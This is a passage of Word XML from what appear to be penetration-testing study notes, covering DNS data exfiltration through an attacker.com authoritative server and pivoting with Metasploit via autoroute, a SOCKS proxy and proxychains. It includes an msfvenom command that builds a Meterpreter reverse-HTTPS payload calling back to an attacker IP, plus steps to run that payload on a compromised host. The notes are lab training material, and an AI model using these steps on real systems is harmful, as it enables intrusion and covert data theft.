      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You run dnsmasq, dnscat2-server, or bind9 on your Kali machine, listening on UDP port 53.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B34">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="917"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You register a domain (like attacker.com) and configure it to point to your Kali’s public IP as the authoritative server for that domain.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B35">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="917"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When the victim makes a DNS request (e.g., data123.attacker.com), the DNS resolver eventually sends it to your Kali box.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B36">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="917"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali receives the query and extracts the payload from the subdomain (data123).</w:t>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How It Works (Simplified Flow):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B39">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="980"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Victim sends a DNS query</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for a domain like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">data123.attacker.com</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="980"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">DNS Resolver forwards the query</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> through the DNS hierarchy.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="980"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Query reaches your DNS server (which is your kali machin)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (authoritative for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">attacker.com</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B3C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="980"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You extract the data</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data123</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) embedded in the subdomain.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B3D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="980"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(Optional)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: You reply with a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TXT record or IP</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to send data </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">back</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the victim.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B3E">
      <w:pPr>
        <w:spacing w:after="0" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B3F">
      <w:pPr>
        <w:spacing w:after="0" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In short:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B40">
      <w:pPr>
        <w:spacing w:after="0" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The victim sneaks data out inside DNS queries. Your DNS server receives them and extracts the data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B41">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B42">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B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44">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8ccsnocegsk2" w:id="95"/>
      <w:bookmarkEnd w:id="95"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Pivoting with Metasploit </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B45">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A real-life example of this was seen in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XXXXXXXXX 27.4.2. Services and Sessions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They used multi/manage/autoroute to add route to Metasploit's Route Table</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They then set up SOCKS Proxy on Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B48">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then used Proxychains on each command to make it run through proxy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B49">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They used a variety of tools with proxychains, which is cool to see</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B4A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B4B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We are pivoting on Windows Machines. Our Kali is currently only in the 192 subnet.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B4C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B4D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This requires that a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit METERPRETER session is currently inside of a compromised machine</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. A simple shell inside of metasploit won't work. So make sure to either upgrade to meterpreter, or catch a meterpreter reverse shell payload</w:t>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t xml:space="preserve">You can look at </w:t>
      </w:r>
      <w:hyperlink w:anchor="_7ta5x79p1511">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">this</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> "How to upgrade from a weak shell to a meterpreter" section to learn how to upgrade from shell to meterpreter</w:t>
      </w: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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4896449" cy="3460471"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="81" name="image81.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image81.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId237"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4896449" cy="3460471"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="217"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ipconfig</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B53">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="217"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We see that this machine is dual-homed, connected to two network interfaces: Ethernet0 and Ethernet1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="217"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And we see the two IP addresses</w:t>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t xml:space="preserve">So, we want to be able to access the 172 subnet from our Kali. And we can pivot using Metasploit. </w:t>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t xml:space="preserve">We can try to identify other live hosts on this second network by leveraging methods from active information gathering. Before we do so, let's start a Meterpreter shell on our compromised target by downloading and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">executing met.exe as well as starting the corresponding multi/handler as we did before</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B59">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="445"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is met.exe:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B5A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="445"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom -p windows/x64/meterpreter_reverse_https LHOST=192.168.119.4 LPORT=443 -f exe -o met.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B5B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="445"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1447800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="576" name="image548.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image548.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId238"/>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B5C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B5D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_d4gxdy7sajoe" w:id="96"/>
      <w:bookmarkEnd w:id="96"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Route Add</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B5E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B5F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now that we have a working session on the compromised system, we can background it. To add a route to a network reachable through a compromised host, we can use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">route add</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the network information and session ID that the route applies to. After adding the route, we can display the current routes with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">route print</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B60">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B61">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4491038" cy="2734927"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="130" name="image123.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image123.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId239"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4491038" cy="2734927"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
